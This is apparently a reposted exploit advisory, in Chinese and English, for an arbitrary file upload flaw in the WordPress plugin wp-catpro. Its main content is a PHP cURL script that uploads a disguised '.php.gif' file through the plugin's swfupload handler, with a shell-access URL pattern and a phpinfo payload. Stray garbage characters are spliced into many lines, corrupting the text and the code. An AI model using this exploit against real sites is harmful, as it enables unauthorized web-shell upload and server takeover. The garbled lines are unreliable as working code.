WordPress插件wp-catpro任意文件上传

admin

Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
#-----------------------------------------------------------------------
  C% T1 y+ {8 h
, ]+ N8 [$ b& L$ J1 \6 g作者  => Zikou-16
1 L0 r2 J, X) y% Q邮箱 => zikou16x@gmail.com
0 S% g; i3 A& z: A7 ~5 B! U测试系统 : Windows 7 , Backtrack 5r3
下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
( Y/ {0 U% ?4 O% u% r( V/ L####

#=> Exploit 信息:
. f4 W/ N% }! g6 K+ P------------------
! D  w6 V! J% J; D3 C. y, F  C1 j. v# 攻击者可以上传 file/shell.php.gif
# ("jpg", "gif", "png")  // Allowed file extensions
# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
! n" {- i: F- K* U# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
------------------

#=> Exploit
( d" ^# E/ |6 R, o) t* K-----------
<?php

" l, T5 t2 O0 V9 F2 ]$uploadfile="zik.php.gif";
$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
" l: a9 g2 @4 Z  x$ w/ V- `curl_setopt($ch, CURLOPT_POST, true);
- q0 H2 K1 \6 }1 B( Kcurl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'folder'=>'/wp-content/uploads/catpro/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
' C, l- R1 J0 F. m, w) z5 @+ Pcurl_close($ch);
) q; l6 s; k% s2 Z5 H1 d( N; ^+ h
9 z/ q; L, Q3 v$ |8 d3 xprint "$postResult";

Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
  ?>
<?php
phpinfo();
, c# R$ Y) a" ~% D: |?>